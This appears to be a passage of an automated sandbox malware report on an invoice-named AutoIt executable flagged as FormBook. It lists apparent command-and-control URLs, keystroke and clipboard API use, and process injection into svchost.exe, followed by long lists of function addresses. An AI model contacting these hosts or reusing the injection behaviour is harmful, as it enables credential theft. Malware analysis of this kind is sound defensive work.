          Source: INV_NE_02_2034388.exe, 00000000.00000003.1292338634.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1286250862.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1296335740.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1288005450.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1287564151.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1297197458.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1307257706.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1285212644.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1296483664.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1301284711.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000002.1342241605.0000000000D6F000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1284963561.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1296799474.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1285623478.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/wtafuencqgdxd
          Source: INV_NE_02_2034388.exe, 00000000.00000002.1342241605.0000000000D6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/wtafuencqgdxds
          Source: INV_NE_02_2034388.exe, 00000000.00000002.1341299019.0000000000C58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ssbzmoy.biz/SgL
          Source: elevation_service.exe.0.drString found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff
          Source: elevation_service.exe.0.drString found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00474164
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00474164
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00473F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00473F66
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_0046001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0046001C
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_0048CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0048CABC

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 17.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000011.00000002.1702591892.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.1704054953.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Binary is likely a compiled AutoIt script file
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: This is a third-party compiled AutoIt script.0_2_00403B3A
          Source: INV_NE_02_2034388.exeString found in binary or memory: This is a third-party compiled AutoIt script.
          Source: INV_NE_02_2034388.exe, 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_653b9630-7
          Source: INV_NE_02_2034388.exe, 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_2b41795b-b
          Source: INV_NE_02_2034388.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_3a1e9cf1-a
          Source: INV_NE_02_2034388.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_9992aa7a-d
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0042CBC3 NtClose,17_2_0042CBC3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C72B60 NtClose,LdrInitializeThunk,17_2_03C72B60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C72DF0 NtQuerySystemInformation,LdrInitializeThunk,17_2_03C72DF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C735C0 NtCreateMutant,LdrInitializeThunk,17_2_03C735C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C74340 NtSetContextThread,17_2_03C74340
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C74650 NtSuspendThread,17_2_03C74650
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C72BE0 NtQueryValueKey,17_2_03C72BE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C72BF0 NtAllocateVirtualMemory,17_2_03C72BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C72B80 NtQueryInformationFile,17_2_03C72B80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C72BA0 NtEnumerateValueKey,17_2_03C72BA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C72AD0 NtReadFile,17_2_03C72AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C72AF0 NtWriteFile,17_2_03C72AF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C72AB0 NtWaitForSingleObject,17_2_03C72AB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C72FE0 NtCreateFile,17_2_03C72FE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C72F90 NtProtectVirtualMemory,17_2_03C72F90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C72FA0 NtQuerySection,17_2_03C72FA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C72FB0 NtResumeThread,17_2_03C72FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C72F60 NtCreateProcessEx,17_2_03C72F60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C72F30 NtCreateSection,17_2_03C72F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C72EE0 NtQueueApcThread,17_2_03C72EE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C72E80 NtReadVirtualMemory,17_2_03C72E80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C72EA0 NtAdjustPrivilegesToken,17_2_03C72EA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C72E30 NtWriteVirtualMemory,17_2_03C72E30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C72DD0 NtDelayExecution,17_2_03C72DD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C72DB0 NtEnumerateKey,17_2_03C72DB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C72D00 NtSetInformationFile,17_2_03C72D00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C72D10 NtMapViewOfSection,17_2_03C72D10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C72D30 NtUnmapViewOfSection,17_2_03C72D30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C72CC0 NtQueryVirtualMemory,17_2_03C72CC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C72CF0 NtOpenProcess,17_2_03C72CF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C72CA0 NtQueryInformationToken,17_2_03C72CA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C72C60 NtCreateKey,17_2_03C72C60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C72C70 NtFreeVirtualMemory,17_2_03C72C70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C72C00 NtQueryInformationProcess,17_2_03C72C00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C73090 NtSetValueKey,17_2_03C73090
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C73010 NtOpenDirectoryObject,17_2_03C73010
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C739B0 NtGetContextThread,17_2_03C739B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C73D70 NtOpenThread,17_2_03C73D70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C73D10 NtOpenProcessToken,17_2_03C73D10
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_0046A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_0046A1EF
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00458310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00458310
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_004651BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_004651BD
          Source: C:\Windows\System32\AppVClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\7c03ee2ee2c8fb2a.binJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_0040E6A00_2_0040E6A0
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_0042D9750_2_0042D975
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_0040FCE00_2_0040FCE0
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_004221C50_2_004221C5
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_004362D20_2_004362D2
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_004803DA0_2_004803DA
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_0043242E0_2_0043242E
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_004225FA0_2_004225FA
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_0045E6160_2_0045E616
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_004166E10_2_004166E1
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_0043878F0_2_0043878F
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_004368440_2_00436844
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_004808570_2_00480857
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_004188080_2_00418808
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_004688890_2_00468889
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_0042CB210_2_0042CB21
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00526CC80_2_00526CC8
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00436DB60_2_00436DB6
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00416F9E0_2_00416F9E
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_004130300_2_00413030
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_0042F1D90_2_0042F1D9
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_004231870_2_00423187
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_004012870_2_00401287
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_004214840_2_00421484
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_004155200_2_00415520
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_004276960_2_00427696
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_004157600_2_00415760
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_004219780_2_00421978
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00439AB50_2_00439AB5
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00487DDB0_2_00487DDB
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00421D900_2_00421D90
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_0042BDA60_2_0042BDA6
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_0040DF000_2_0040DF00
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00413FE00_2_00413FE0
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00BC00D90_2_00BC00D9
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00B86EAF0_2_00B86EAF
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00B851EE0_2_00B851EE
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00BBD5800_2_00BBD580
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00BB37800_2_00BB3780
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00BBC7F00_2_00BBC7F0
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00BC39A30_2_00BC39A3
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00BB59800_2_00BB5980
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00B87B710_2_00B87B71
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00B87F800_2_00B87F80
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00E9F2800_2_00E9F280
          Source: C:\Windows\System32\AppVClient.exeCode function: 12_2_0055A81012_2_0055A810
          Source: C:\Windows\System32\AppVClient.exeCode function: 12_2_00537C0012_2_00537C00
          Source: C:\Windows\System32\AppVClient.exeCode function: 12_2_00562D4012_2_00562D40
          Source: C:\Windows\System32\AppVClient.exeCode function: 12_2_005379F012_2_005379F0
          Source: C:\Windows\System32\AppVClient.exeCode function: 12_2_0055EEB012_2_0055EEB0
          Source: C:\Windows\System32\AppVClient.exeCode function: 12_2_005592A012_2_005592A0
          Source: C:\Windows\System32\AppVClient.exeCode function: 12_2_005593B012_2_005593B0
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 16_2_009BA81016_2_009BA810
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 16_2_009979F016_2_009979F0
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 16_2_009B92A016_2_009B92A0
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 16_2_009B93B016_2_009B93B0
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 16_2_00997C0016_2_00997C00
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 16_2_009C2D4016_2_009C2D40
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 16_2_009BEEB016_2_009BEEB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0040E85517_2_0040E855
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_004010C817_2_004010C8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_004010D017_2_004010D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0042F1D317_2_0042F1D3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_004029F817_2_004029F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_00402A0017_2_00402A00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_004032D017_2_004032D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0041040A17_2_0041040A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0041041317_2_00410413
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0040150017_2_00401500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_00416DA317_2_00416DA3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0040E64317_2_0040E643
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0041063317_2_00410633
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_004026F017_2_004026F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0040E78817_2_0040E788
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0040E79317_2_0040E793
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C4E3F017_2_03C4E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03D003E617_2_03D003E6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CFA35217_2_03CFA352
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CC02C017_2_03CC02C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CE027417_2_03CE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CF81CC17_2_03CF81CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CF41A217_2_03CF41A2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03D001AA17_2_03D001AA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CC815817_2_03CC8158
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C3010017_2_03C30100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CDA11817_2_03CDA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CD200017_2_03CD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C3C7C017_2_03C3C7C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6475017_2_03C64750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C4077017_2_03C40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C5C6E017_2_03C5C6E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03D0059117_2_03D00591
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C4053517_2_03C40535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CEE4F617_2_03CEE4F6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CF244617_2_03CF2446
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CE442017_2_03CE4420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CF6BD717_2_03CF6BD7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CFAB4017_2_03CFAB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C3EA8017_2_03C3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C429A017_2_03C429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03D0A9A617_2_03D0A9A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C5696217_2_03C56962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6E8F017_2_03C6E8F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C268B817_2_03C268B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C4A84017_2_03C4A840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C4284017_2_03C42840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C32FC817_2_03C32FC8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C4CFE017_2_03C4CFE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CBEFA017_2_03CBEFA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB4F4017_2_03CB4F40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C82F2817_2_03C82F28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C60F3017_2_03C60F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CE2F3017_2_03CE2F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CFEEDB17_2_03CFEEDB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C52E9017_2_03C52E90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CFCE9317_2_03CFCE93
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C40E5917_2_03C40E59
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CFEE2617_2_03CFEE26
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C3ADE017_2_03C3ADE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C58DBF17_2_03C58DBF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C4AD0017_2_03C4AD00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CDCD1F17_2_03CDCD1F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C30CF217_2_03C30CF2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CE0CB517_2_03CE0CB5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C40C0017_2_03C40C00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C8739A17_2_03C8739A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C2D34C17_2_03C2D34C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CF132D17_2_03CF132D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C5B2C017_2_03C5B2C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CE12ED17_2_03CE12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C452A017_2_03C452A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C4B1B017_2_03C4B1B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C7516C17_2_03C7516C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C2F17217_2_03C2F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03D0B16B17_2_03D0B16B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CEF0CC17_2_03CEF0CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C470C017_2_03C470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CF70E917_2_03CF70E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CFF0E017_2_03CFF0E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CFF7B017_2_03CFF7B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CF16CC17_2_03CF16CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C8563017_2_03C85630
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03D095C317_2_03D095C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CDD5B017_2_03CDD5B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CF757117_2_03CF7571
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C3146017_2_03C31460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CFF43F17_2_03CFF43F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB5BF017_2_03CB5BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C7DBF917_2_03C7DBF9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C5FB8017_2_03C5FB80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CFFB7617_2_03CFFB76
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CEDAC617_2_03CEDAC6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CDDAAC17_2_03CDDAAC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C85AA017_2_03C85AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CE1AA317_2_03CE1AA3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CFFA4917_2_03CFFA49
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CF7A4617_2_03CF7A46
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB3A6C17_2_03CB3A6C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C4995017_2_03C49950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C5B95017_2_03C5B950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CD591017_2_03CD5910
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C438E017_2_03C438E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CAD80017_2_03CAD800
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C03FD217_2_03C03FD2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C03FD517_2_03C03FD5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C41F9217_2_03C41F92
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CFFFB117_2_03CFFFB1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CFFF0917_2_03CFFF09
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C49EB017_2_03C49EB0
